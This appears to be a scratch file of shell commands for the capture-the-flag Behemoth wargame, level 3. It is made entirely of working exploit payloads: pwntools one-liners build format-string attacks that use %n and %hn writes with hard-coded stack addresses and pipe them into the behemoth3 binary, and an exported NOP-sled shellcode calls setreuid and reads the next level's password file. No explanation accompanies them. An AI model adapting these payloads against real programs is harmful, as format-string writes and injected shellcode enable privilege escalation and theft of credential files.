# echo `python -c "from pwn import *; print '\x75\xa1\xff\xff' + '%6\\$s' * 1 + '\xf8\x99\xff\xff' * 45  + '%56\\$n%56\\$x'"` | /behemoth/behemoth3


export CODE=`python -c "from pwn import *;print asm(shellcraft.nop()*102
4*16 + shellcraft.setreuid() + shellcraft.cat('/etc/behemoth_pass/behemoth4'))"`

echo `python -c "from pwn import *; print '\x95\xab\xff\xff' + ('%6\\$s' * 3) + ('\xf8\xff\xff\xff' * 42) + ('\xfa\x95\xff\xff' * 1)  + '%52\\$hn'"` | /behemoth/behemoth3


echo `python -c "from pwn import *; print '\xb5\xb9\xff\xff' + ('%6\\$s' * 4) + ('\xf8\xa0\xff\xff' * 42) + ('\xf0\x95\xff\xff' * 1)  + '%53\\$hn'"` | strace /behemoth/behemoth3

